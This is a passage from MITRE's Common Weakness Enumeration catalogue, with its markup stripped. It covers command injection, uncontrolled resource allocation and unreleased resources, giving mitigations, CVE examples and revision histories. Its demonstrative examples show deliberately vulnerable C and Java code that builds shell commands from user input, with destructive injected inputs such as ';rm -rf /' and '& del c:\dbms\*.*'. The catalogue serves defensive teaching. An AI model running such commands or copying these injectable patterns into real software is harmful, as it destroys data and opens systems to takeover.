enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Operation + Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands. + + + System Configuration + Assign permissions that prevent the user from accessing/opening privileged files. + + + + + The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. + + int main(int argc, char** argv) {char cmd[CMD_MAX] = "/usr/bin/cat ";strcat(cmd, argv[1]);system(cmd);} + + Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition. + Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). + + + The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. + + ...String btype = request.getParameter("backuptype");String cmd = new String("cmd.exe /K \"c:\\util\\rmanDB.bat "+btype+"&&c:\\utl\\cleanup.bat\"") + System.Runtime.getRuntime().exec(cmd);... + + The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well. + + + The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory. + + ...String home = System.getProperty("APPHOME");String cmd = home + INITCMD;java.lang.Runtime.getRuntime().exec(cmd);... + + The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system. + + + The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable: + + #include <stdio.h>#include <unistd.h> + int main(int argc, char **argv) { + + char cat[] = "cat ";char *command;size_t commandLength; + commandLength = strlen(cat) + strlen(argv[1]) + 1;command = (char *) malloc(commandLength);strncpy(command, cat, commandLength);strncat(command, argv[1], (commandLength - strlen(cat)) ); + system(command);return (0); + } + + Used normally, the output is simply the contents of the file requested: + + $ ./catWrapper Story.txtWhen last we left our heroes... + + However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint: + + $ ./catWrapper Story.txt; lsWhen last we left our heroes...Story.txtSensitiveFile.txtPrivateData.dba.out* + + If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege. + + + + + CVE-2022-36069 + Python-based dependency management tool avoids OS command injection when generating Git commands but allows injection of optional arguments with input beginning with a dash, potentially allowing for code execution. + https://www.cve.org/CVERecord?id=CVE-2022-36069 + + + CVE-1999-0067 + Canonical example of OS command injection. CGI program does not neutralize "|" metacharacter when invoking a phonebook program. + https://www.cve.org/CVERecord?id=CVE-1999-0067 + + + CVE-2020-9054 + Chain: improper input validation (CWE-20) in username parameter, leading to OS command injection (CWE-78), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + CVE-2022-1509 + injection of sed script syntax ("sed injection") + https://www.cve.org/CVERecord?id=CVE-2022-1509 + + + CVE-2021-41282 + injection of sed script syntax ("sed injection") + https://www.cve.org/CVERecord?id=CVE-2021-41282 + + + CVE-2019-13398 + injection of sed script syntax ("sed injection") + https://www.cve.org/CVERecord?id=CVE-2019-13398 + + + CVE-2019-12921 + image program allows injection of commands in "Magick Vector Graphics (MVG)" language. + https://www.cve.org/CVERecord?id=CVE-2019-12921 + + + CVE-2020-11698 + anti-spam product allows injection of SNMP commands into confiuration file + https://www.cve.org/CVERecord?id=CVE-2020-11698 + + + + + Command Injection + + + Command injection + + + A2 + Injection Flaws + CWE More Specific + + + A1 + Unvalidated Input + CWE More Specific + + + A6 + Injection Flaws + CWE More Specific + + + SFP24 + Tainted input to command + + + IDS34-PL + Do not pass untrusted, unsanitized data to a command interpreter + CWE More Specific + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + CWE-77 is often misused when OS command injection (CWE-78) was intended instead [REF-1287]. + If the weakness involves a command language besides OS shell invocation, then CWE-77 could be used. + + + + + + + The "command injection" phrase carries different meanings to different people. For some people, it refers to any type of attack that can allow the attacker to execute commands of their own choosing, regardless of how those commands are inserted. The command injection could thus be resultant from another weakness. This usage also includes cases in which the functionality allows the user to specify an entire command, which is then executed; within CWE, this situation might be better regarded as an authorization problem (since an attacker should not be able to specify arbitrary commands.) + Another common usage, which includes CWE-77 and its descendants, involves cases in which the attacker injects separators into the command being constructed. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples, Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2010-02-16 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes, Terminology_Notes + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Description, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References, Terminology_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Anonymous External Contributor + 2022-05-20 + reported typo in Terminology note + + Command Injection + Failure to Sanitize Data into a Control Plane (aka 'Command Injection') + Failure to Sanitize Data into a Control Plane ('Command Injection') + Improper Sanitization of Special Elements used in a Command ('Command Injection') + + + + The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor. + Code frequently has to work with limited resources, so programmers must be careful to ensure that resources are not consumed too quickly, or too easily. Without use of quotas, resource limits, or other protection mechanisms, it can be easy for an attacker to consume many resources by rapidly making many requests, or causing larger resources to be used than is needed. When too many resources are allocated, or if a single resource is too large, then it can prevent the code from working correctly, possibly leading to a denial of service. + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Operation + + + System Configuration + + + High + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource. + + + + + Manual Static Analysis + Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all. + + + Fuzzing + + While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted product in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause. + When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness. + + Opportunistic + + + Automated Dynamic Analysis + Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the product within a short time frame. Manual analysis is likely required to interpret the results. + + + Automated Static Analysis + + Specialized configuration or tuning may be required to train automated tools to recognize this weakness. + Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value. + Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day. + + + + + + Requirements + Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits. + + + Architecture and Design + Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410. + + + Architecture and Design + Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + This will only be applicable to cases where user input can influence the size or frequency of resource allocations. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + + Mitigation of resource exhaustion attacks requires that the target system either: + + recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays + uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed. + + The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question. + The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker. + + + + Architecture and Design + Ensure that protocols have specific limits of scale placed on them. + + + Architecture and Design + Implementation + + If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery. + Ensure that all failures in resource allocation place the system into a safe posture. + + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + This code allocates a socket and forks each time it receives a new connection. + + sock=socket(AF_INET, SOCK_STREAM, 0);while (1) {newsock=accept(sock, ...);printf("A connection has been accepted\n");pid = fork();} + + The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely. + + + In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket. + + int writeDataFromSocketToFile(char *host, int port){ + + char filename[FILENAME_SIZE];char buffer[BUFFER_SIZE];int socket = openSocketConnection(host, port); + if (socket < 0) {printf("Unable to open socket connection");return(FAIL);}if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) { + if (openFileToWrite(filename) > 0) { + while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){if (!(writeToFile(buffer) > 0))break; + } + }closeFile(); + }closeSocket(socket); + } + + This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service. + + + In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array. + + + + /* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */ + int processMessage(char **message){ + char *body; + int length = getMessageLength(message[0]); + if (length > 0) {body = &message[1][0];processMessageBody(body);return(SUCCESS);}else {printf("Unable to process message; invalid message length");return(FAIL);} + } + + This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check + Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code. + + unsigned int length = getMessageLength(message[0]);if ((length > 0) && (length < MAX_LENGTH)) {...} + + + + In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket. + + public void acceptConnections() { + + try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);t.start();}serverSocket.close(); + + } catch (IOException ex) {...} + } + + In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources. + The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated. + + public static final int SERVER_PORT = 4444;public static final int MAX_CONNECTIONS = 10;... + public void acceptConnections() { + + try {ServerSocket serverSocket = new ServerSocket(SERVER_PORT);int counter = 0;boolean hasConnections = true;while (hasConnections) {hasConnections = checkForMoreConnections();Socket client = serverSocket.accept();Thread t = new Thread(new ClientSocketThread(client));t.setName(client.getInetAddress().getHostName() + ":" + counter++);ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);pool.execute(t);}serverSocket.close(); + + } catch (IOException ex) {...} + } + + + + An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased. + + + + + + Here the problem is that every time a connection is made, more memory is allocated. So if one just opened up more and more connections, eventually the machine would run out of memory. + + bar connection() {foo = malloc(1024);return foo;}endConnection(bar foo) {free(foo);}int main() {while(1) {foo=connection();}endConnection(foo)} + + + + + + CVE-2022-21668 + Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190). + https://www.cve.org/CVERecord?id=CVE-2022-21668 + + + CVE-2009-4017 + Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts.. + https://www.cve.org/CVERecord?id=CVE-2009-4017 + + + CVE-2009-2726 + Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption. + https://www.cve.org/CVERecord?id=CVE-2009-2726 + + + CVE-2009-2540 + Large integer value for a length property in an object causes a large amount of memory allocation. + https://www.cve.org/CVERecord?id=CVE-2009-2540 + + + CVE-2009-2054 + Product allows exhaustion of file descriptors when processing a large number of TCP packets. + https://www.cve.org/CVERecord?id=CVE-2009-2054 + + + CVE-2008-5180 + Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created. + https://www.cve.org/CVERecord?id=CVE-2008-5180 + + + CVE-2008-1700 + Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window. + https://www.cve.org/CVERecord?id=CVE-2008-1700 + + + CVE-2005-4650 + CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion. + https://www.cve.org/CVERecord?id=CVE-2005-4650 + + + CVE-2020-15100 + web application scanner attempts to read an excessively large file created by a user, causing process termination + https://www.cve.org/CVERecord?id=CVE-2020-15100 + + + CVE-2020-7218 + Go-based workload orchestrator does not limit resource usage with unauthenticated connections, allowing a DoS by flooding the service + https://www.cve.org/CVERecord?id=CVE-2020-7218 + + + + + FIO04-J + Close resources when they are no longer needed + + + SER12-J + Avoid memory and resource leaks during serialization + + + MSC05-J + Do not exhaust heap space + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry is different from uncontrolled resource consumption (CWE-400) in that there are other weaknesses that are related to inability to control resource consumption, such as holding on to a resource too long after use, or not correctly keeping track of active resources so that they can be managed and released when they are finished (CWE-771). + Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place. + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2009-07-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Observed_Examples, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Common_Consequences, Demonstrative_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples, Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Demonstrative_Examples, Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Applicable_Platforms, Description, Maintenance_Notes, Potential_Mitigations, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly maintain a reference to a resource that has been allocated, which prevents the resource from being reclaimed. + This does not necessarily apply in languages or frameworks that automatically perform garbage collection, since the removal of all references may act as a signal that the resource is ready to be reclaimed. + + + + + + Implementation + + + Medium + + + Availability + DoS: Resource Consumption (Other) + An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource. + + + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + MEM31-C + Free dynamically allocated memory when no longer needed + CWE More Abstract + + + SFP14 + Failure to Release Resource + + + Part 3-3 + Req SR 7.2 + + + Part 4-1 + Req SVV-1 + + + Part 4-2 + Req CR 7.2 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Maintenance_Notes, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed. + When a resource is not released after use, it can allow attackers to cause a denial of service by causing the allocation of resources without triggering their release. Frequently-affected resources include memory, CPU, disk space, power or battery, etc. + + + + + + + + + + + + Implementation + + + High + + + Availability + DoS: Resource Consumption (Other) + An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource. + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, languages such as Java, Ruby, and Lisp perform automatic garbage collection that releases memory for objects that have been deallocated. + + + + Implementation + It is good practice to be responsible for freeing all resources you allocate and to be consistent with how and where you free resources in a function. If you allocate resources that you intend to free upon completion of the function, you must be sure to free the resources at all exit points for that function including error conditions. + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + The following method never closes the new file handle. Given enough time, the Finalize() method for BufferReader should eventually call Close(), but there is no guarantee as to how long this action will take. In fact, there is no guarantee that Finalize() will ever be invoked. In a busy environment, the Operating System could use up all of the available file handles before the Close() function is called. + + private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}} + + The good code example simply adds an explicit call to the Close() function when the system is done using the file. Within a simple example such as this the problem is easy to see and fix. In a real system, the problem may be considerably more obscure. + + private void processFile(string fName){BufferReader fil = new BufferReader(new FileReader(fName));String line;while ((line = fil.ReadLine()) != null){processLine(line);}fil.Close();} + + + + The following code attempts to open a new connection to a database, process the results returned by the database, and close the allocated SqlConnection object. + + SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close(); + + The problem with the above code is that if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. + + + This code attempts to open a connection to a database and catches any exceptions that may occur. + + try {Connection con = DriverManager.getConnection(some_connection_string);}catch ( Exception e ) {log( e );} + + If an exception occurs after establishing the database connection and before the same connection closes, the pool of database connections may become exhausted. If the number of available connections is exceeded, other users cannot access this resource, effectively denying access to the application. + + + Under normal conditions the following C# code executes a database query, processes the results returned by the database, and closes the allocated SqlConnection object. But if an exception occurs while executing the SQL or processing the results, the SqlConnection object is not closed. If this happens often enough, the database will run out of available cursors and not be able to execute any more SQL queries. + + ...SqlConnection conn = new SqlConnection(connString);SqlCommand cmd = new SqlCommand(queryString);cmd.Connection = conn;conn.Open();SqlDataReader rdr = cmd.ExecuteReader();HarvestResults(rdr);conn.Connection.Close();... + + + + The following C function does not close the file handle it opens if an error occurs. If the process is long-lived, the process can run out of file handles. + + int decodeFile(char* fName) { + char buf[BUF_SZ];FILE* f = fopen(fName, "r");if (!f) {printf("cannot open %s\n", fName);return DECODE_FAIL;}else { + while (fgets(buf, BUF_SZ, f)) {if (!checkChecksum(buf)) {return DECODE_FAIL;}else {decodeBlock(buf);}} + }fclose(f);return DECODE_SUCCESS; + } + + + + + + CVE-2007-0897 + Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. + https://www.cve.org/CVERecord?id=CVE-2007-0897 + + + CVE-2001-0830 + Sockets not properly closed when attacker repeatedly connects and disconnects from server. + https://www.cve.org/CVERecord?id=CVE-2001-0830 + + + CVE-1999-1127 + Does not shut down named pipe connections if malformed data is sent. + https://www.cve.org/CVERecord?id=CVE-1999-1127 + + + CVE-2009-2858 + Chain: memory leak (CWE-404) leads to resource exhaustion. + https://www.cve.org/CVERecord?id=CVE-2009-2858 + + + CVE-2009-2054 + Product allows exhaustion of file descriptors when processing a large number of TCP packets. + https://www.cve.org/CVERecord?id=CVE-2009-2054 + + + CVE-2008-2122 + Port scan triggers CPU consumption with processes that attempt to read data from closed sockets. + 